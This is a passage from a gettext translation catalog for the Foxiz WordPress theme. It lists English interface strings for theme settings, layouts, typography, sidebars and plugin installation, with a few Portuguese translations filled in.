#: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/single-post.php:1492 msgid "" "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "Mostrando %s resultados para sua pesquisa" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "Entrar" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "Sair" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr "" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not " "plan to use it." msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some " "different keywords." msgstr "" "Desculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente " "novamente com algumas palavras-chave diferentes." #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin." " Contact the administrator of this site for help on getting the plugin " "activated." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "Fontes:" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" #: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll " "find them all here." msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/panels/single-post.php:1582 msgid "" "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/newsletter.php:43 msgid "" "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "Tags" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme " "provides other ways for you to add any info into the header template via " "HTML, text and button and other blocks." msgstr "" #: backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install " "and activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/single-post.php:385 msgid "" "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/general.php:27 msgid "" "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the " "server cache." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with Foxiz: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" " "section." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is " "about 600px for the retina screen." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: backend/panels/single-post.php:46 msgid "" "The layout automatically rollback to the \"Classic\" if featured image isn't " "set." msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than " "this setting." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to " "display adverts or the post related shortcode." msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to " "display adverts" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the " "selected entry category." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into " "content." msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:36 msgid "" "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/typography.php:594 msgid "" "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the " "corresponding panel if you select another post format for this post." msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "" "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query " "Template Shortcode\" to build the blog listing." msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options >" " Category\"." msgstr "" #: templates/popup.php:108 msgid "" "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can " "override the settings in this panel." msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override " "settings in this panel." msgstr "" #: backend/panels/design.php:667 msgid "" "The small border style in featured images and other element whole the " "website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation " "for further information." msgstr "" #: backend/panels/breadcrumb.php:16 msgid "" "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, " "body, meta." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You " "can override settings in the panel below." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5," " Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide " "image at the top." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all " "category pages." msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, " "date, total views, total comments..." msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank " "Math SEO breadcrumbs in order to work." msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query " "or change the block settings: " msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured " "images." msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar " "Position\" settings." msgstr "" #: backend/single-metaboxes.php:284 msgid "" "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) " "when visitor scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 